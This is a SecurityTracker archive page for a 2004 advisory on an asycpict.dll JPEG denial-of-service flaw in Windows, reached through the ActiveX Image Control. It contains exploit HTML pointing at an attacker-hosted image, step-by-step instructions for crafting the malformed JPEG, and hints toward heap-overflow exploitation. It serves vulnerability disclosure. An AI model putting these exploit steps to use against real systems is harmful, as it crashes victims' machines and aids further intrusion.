SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Windows DLL (Any) Vendors:   Microsoft
Microsoft Operating System 'asycpict.dll' Lets Remote Users Crash the System
SecurityTracker Alert ID:  1011706
SecurityTracker URL:  http://securitytracker.com/id/1011706
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 15 2004
Impact:   Denial of service via network


Description:   A vulnerability was reported in Microsoft Windows in the 'asycpict.dll' in the processing of JPEG images. A remote user can cause a target user's system to crash.

John Bissell reported that a remote user can create HTML that, when loaded by the target user, will invoke the Microsoft ActiveX Image Control which, in turn, will use 'asycpict.dll' to render images. A remote user can create a specially crafted JPEG image that, when loaded via the previously described method, will consume excessive memory on the target system, requiring a reboot to return to normal operations.

It is reported that the software does not properly validate the Image Width and Image Height fields of the SOF marker. A remote user can create a malicious image file by setting the image dimension fields to four consecutive 0xFF bytes.

Some demonstration exploit HTML code is provided:

<HTML>
<HEAD>
<TITLE>Think of something clever!</TITLE>
</HEAD>
<BODY>
<OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96"
CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF"
CODEBASE="http://activex.microsoft.com/controls/mspert10.cab">
<PARAM NAME="BorderStyle" VALUE="0">
<PARAM NAME="SizeMode" VALUE="3">
<PARAM NAME="Size" VALUE="2540;2540">
<PARAM NAME="PicturePath" VALUE="http://[attacker]/freeze_system.jpg">
<PARAM NAME="PictureAlignment" VALUE="0">
<PARAM NAME="VariousPropertyBits" VALUE="19">
</OBJECT>
</BODY>
</HTML>

The report indicates that there may be other security relevant flaws in the DLL and that it may be possible to execute arbitrary code, however, code execution was not confirmed.

[Editor's note: The DLL could not be located on our Windows XP SP2 systems.]

Impact:   A remote user can cause a target user's system to crash.

A remote user may also be able to execute arbitrary code on the target user' system [however, code execution was not confirmed].

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/ (Links to External Site)
Cause:   Exception handling error, Input validation error

Message History:   None.


 Source Message Contents

Subject:  New Remote Microsoft JPEG DoS Vulnerability + Other Potential




 +---------------------------------------------------------------------+
 |                                                                     |
 |  =================================================================  |
 |   Microsoft asycpict.dll 1.0 Remote JPEG DoS Attack Vulnerability   |
 |                                +                                    |
 |          Multiple Other Possible Security Vulnerabilitys            |
 |                     Full Disclosure Advisory                        |
 |  =================================================================  |
 |                                                                     |
 |          =============================================              |
 |           Discovered by John Bissell A.K.A. HighT1mes               |
 |          =============================================              |
 |                                                                     |
 +---------------------------------------------------------------------+

Date This Advisory Was Released:
================================

 October, 14, 2004

Risk:
=====

 - High (DoS Attack, possibly Remote Code Execution)

Platforms Affected:
===================

 - WinXP (all service packs)
 - Possibly all other verions of Windows OS
   after Win 3.1 since this is a really old dll

Introduction:
=============

  Sadly there is yet another JPEG image processing security vulnerability in Microsoft Windows that can be exploited remotely by malicious
 web page or email on all WinXP systems (actually most likely on ALL Windows systems above Windows 3.1) including WinXP with SP2 that
 can cause a DoS on a system which will need to be rebooted in order to continue using the system. I only describe in detail the proven
 DoS vulnerability I found but there is in reality many other vulnerabilitys in this dll that look very exploitable. I describe a
 few of them below that could possibly allow the worst to happen. Remote code execution...

  While messing around about a week or two ago with old Microsoft
ActiveX controls I came upon a nasty DoS attack that will eat up all 
of a victims RAM for a system that has been exploited by this particular 
security vulnerability in the asycpict.dll 1.0. If you or someone is exploited by this vulnerability then there whole WinXP (all service
 packs) system will become almost completely frozen (even after closing the exploited program). This will of course require some form
 of a reboot to free up the system RAM and make the system useable again.

  There are also many other potential security vulnerabilitys 
lurking inside of this insecure dll that may possibly lead to complete
remote system takeover. These vulnerabilitys if exploitable (including 
the proved DoS attack above) could be exploited in a web page on a web server by getting a victim to somehow view the page in IE 6.0
 (possibly all IE versions are affected that can make use of ActiveX controls). 

  Another attack vector is of course in a email message that affects email clients that can use ActiveX controls in there email. And
 I know there is tons of people out there who use Outlook or OE and get tired of viewing limited, less featurefull emails because
 of the Restricted Zone setting that is enabled by default in the latest OE clients. So they switch the setting to the Internet Zone
 rather. Just do a google search for all the complaints when viewing email in one of these email clients. I'm sure people out there
 want to at least be able to click there friend's links sent through email. When the Restricted Zone security setting is set then
 you can't even do that...


Remote DoS Vulnerability Details:
=================================

  I haven't really done in extensive reverse engineering
regarding this vulnerability, although the reason why this issue
occurs. The reason being is a typical problem of asycpict.dll 1.0
(which is the only version of the dll) not doing a sanity check on
the Image Width and Image Height fields of the SOF marker (0xFFC0)
in a JPEG image. In fact all the vulnerabilitys I discovered from
this dll are from NON defensive programming on Microsoft's part back
a couple years ago. Code auditing for flaws and security vulnerabilitys
must not have been a big deal back when ActiveX technology was first
introduced to the masses.

  Now as I said above there is another component that I've 
found that makes this issue/s remotely exploitable. That would be the
Microsoft ActiveX Image Control 1.0 made a while ago. The control I
just metioned uses the vulnerable asycpict.dll module to load images 
it supports into the control for display. To exploit the victim the
attacker can make a malicious HTML file and JPEG image that exploits
this vulnerability and host them on a web server or embed the HTML code
in a email message to be sent as a email and put the exploit JPEG on 
a web server then send the malicious email message to a victim 
who can read email with ActiveX controls (i.e. OE or Outlook).

  As soon as the victim that is targeted or whoever executes 
that HTML code from the malicious web page or email then the program
will check to see if the ActiveX Image Control is installed already
on the system by checking the registry for a entry/match of the CLSID of 
that control. If no match has occured (control is not installed) then
the attacker can set the CODEBASE attribute of the OBJECT HTML tag to
tell the program to try to install and run the control from a 
Microsoft web server. The control depending on the victims security
settings for ActiveX will either be automatically downloaded and executed
or a prompt will pop up usually before for systems before WinXP SP2 on the
victims moniter asking him if he/she if they want to install and run the
control which is digitally signed by Microsoft to make the control
look safe to download. WinXP SP2 is still affected by these
vulnerabilitys but of course WinXP SP2 makes it a little harder to get
the control installed and/or running on the victims computer.

  Also one other factor plays part in allowing this DoS attack
to occur remotely. The property PicturePath that is a part of the
Microsoft ActiveX Image Control mentioned above can be set to any
valid remote URL that points to the malformed image so when the victim
executes the HTML the ActiveX control will use that remote image. Of 
course this will trigger the DoS Attack on the victims system. No need
to use some other MS vulnerability to try and link the PicturePath 
property with a cached or locally stored malformed JPEG image on the
victims harddrive that was viewed in some way by the victim.


How To Exploit The Remote DoS Vulnerability:
============================================

  To exploit this issue first of all the attacker needs to
craft a malicious HTML file like the following...

<HTML>
<HEAD>
<TITLE>Think of something clever!</TITLE>
</HEAD>
<BODY>
&lt;OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96"
 CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF"
 CODEBASE="http://activex.microsoft.com/controls/mspert10.cab">
    <PARAM NAME="BorderStyle" VALUE="0">
    <PARAM NAME="SizeMode" VALUE="3">
    <PARAM NAME="Size" VALUE="2540;2540">
<PARAM NAME="PicturePath" VALUE="http://www.attackerzserver.com/freeze_system.jpg">
    <PARAM NAME="PictureAlignment" VALUE="0">
    <PARAM NAME="VariousPropertyBits" VALUE="19">
&lt;/OBJECT&gt;
</BODY>
</HTML>

  Next create or use a existing JPEG image for exploiting the problem. 
Open the image in a hex editor (I like Hex Workshop) and do a hex byte search for the bytes 0xFFC0 in the image. This will put you
 right at a nice little SOF marker in the image you want to malform. (also possibly search for 0xFFC0 - 0xFFC4 which I believe are
 also other additional SOF markers, though asycpict.dll might not support those JPEG markers). Now that your at the SOF marker move
 the hex editor cursor 5 bytes foward. You should be at the Image Dimension fields. Now type in 4 consecutive 0xFF bytes in the hex
 editor in overwrite mode. Then simply save the edited JPEG image in the hex editor (Look at the JPEG CREATION NOTE below to get a
 clue why the saved malformed image you just created might not be able to be used for exploiting this security vulnerability).

  I'm sure whoever is reading this knows what to do from here.. but
just in case you are partly computer security challenged you will want to 
upload the JPEG to some sort of server (FTP, Web, AOL, etc) that can be
referenced in Windows from a URL. Now just replace the PicturePath property in the HTML file included above with the URL to your malformed
 exploit JPEG image. Save the HTML file you just edited/created and either upload the page to a web server or send the HTML code in
 a email.

  From here you or the victim just needs to execute the malicous 
HTML code from the web or in a email and you/they will witness the magical
effects of a remote DoS attack if the program is ActiveX enabled and 
the person running the control allows it to be installed or already has
it installed...

  If you would quickly like to test if your vulnerable to this DoS attack
you can visit one of the following web pages in the URL's below which will probaly be removed very quickly once traffic starts to
 pick up on these free test sites from www.tripod.com.

   - http://thisisatestpage0.tripod.com/Page2.htm
   - http://thisisatestpage1.tripod.com/Page2.htm

JPEG CREATION NOTE: 

  If you create a new JPEG image in Photoshop CS and save it to use
as the malformed JPEG then you will have to delete all the embedded EXIF
Photoshop information in the beginning of the image added by Photoshop
with a hex editor as I've learned. For some reason this information will
render the vulnerability useless with that image if that data resides in 
the image. This is probaly due to asycpict.dll not being able to process a
specialied JPEG correctly when it contains header information it can't process.
	

Other Potential Security Vulnerabilitys In asycpict.dll:
========================================================

  There is multiple other flaws/vulnerabilitys in the asycpict.dll 1.0
dll module. They are all caused by bad input sanity checks on JPEG marker 
lengths for a bunch of supported JPEG markers by the vulnerable dll. 

  Some examples of these vulnerabilities that may actually be security
problems are the header length for the SOI marker found at offset 4 of any
normal JPEG. Just mess around with the different length values and then debug to figure if the issue is exploitable. 

  And then of course naturally with this dll having so many problems
validating file input you would think maybe the new GDI+ JPEG vulnerability is perhaps exploitable. Well it does raise a exception
 that you can mess around with perhaps leading to heap overflow explotation (since the JPEG resides on the heap) when a attacker crafts
 a image with this sequence of bytes 0xFF,0xFE,0xFF,0xFF in the image. When this is encountered and processed by the vulnerable dll
 then it's g4m3 0v3r d00d! 

  There is also some more bad news regarding this particular comment
invalid length issue in this dll. I have done a little debugging and if you use the above byte sequence in the image right after the
 0xFFE0 (SOI) marker (offset 0x14 most likely) you will see that when the exception is triggered by viewing a test HTML page opened
 locally with the PicturePath property set to the local filepath of the new malformed JPEG image you created that a typical read/write
 access violation exception will occur. Begin debugging and you might see (if the JPEG is crafted right)
the CPU register EDI or some other register will contain a value that
points to a part of your JPEG image on the heap. Perhaps this is exploitable, as I've said I haven't researched the issue much due
 to school and other projects I'm working on. Remember the key is crafting a JPEG that is composed of the right markers/headers, file
 size, etc that this dll likes. The same principle applys equally to the GDI+ JPEG vulnerability that recently came out. The Windows
 Shell interpets a GDI+ JPEG Exploit image differently then another exploitable program such as Windows Picture and Fax Viewer etc
 when the image is created with just the right components... 

  These issues if exploitable would seem to be exploitable through a 
finely crafted JPEG image exploiting a heap overflow in the asycpict.dll 1.0 module. Who knows what will be found out in the future
 about these vulnerabilitys.
	

Solution:
=========

  One solution to this problem is to turn off all execution of any 
ActiveX controls in the program. This solution is likely to not be very popular because you lose functionality in your program/s BTW
 The HIGH security setting in IE 6.0 doesn't really have much of a effect since this problem takes advantage of a signed Microsoft
 ActiveX control which IE will cheerfully ask if you want install the safe signed Microsoft control and run it! :-(

  Other then that either look out for a upcoming Microsoft patch or 
if your skilled enough then patch the problem yourself in some way. I'll leave that up to the computer security community...

Vendor Status:
==============

  I alerted Microsoft about a week ago about this 
issue and they wanted the details so I gave them to them. I also
asked them to respond back with a few questions I had. They have
not responded back so they either they feel this issue isn't a big
concern or they simply ignored my simple request for a response
to my questions. Soo I feel in my supreme judgement j/k :-P that some 
full disclosure is in order. 

  Pester Microsoft if you fall victim to one of these vulnerablitys. 
I know Microsoft is a big company that  doesn't have time to deal with every email, but if they could respond to my first email message
 and won't take a little bit of time to answer a few little questions I have so I'm not left in the dark, then things could have worked
 out a bit different...

Disclaimer:
===========

	Use of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at
the user's own risk.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC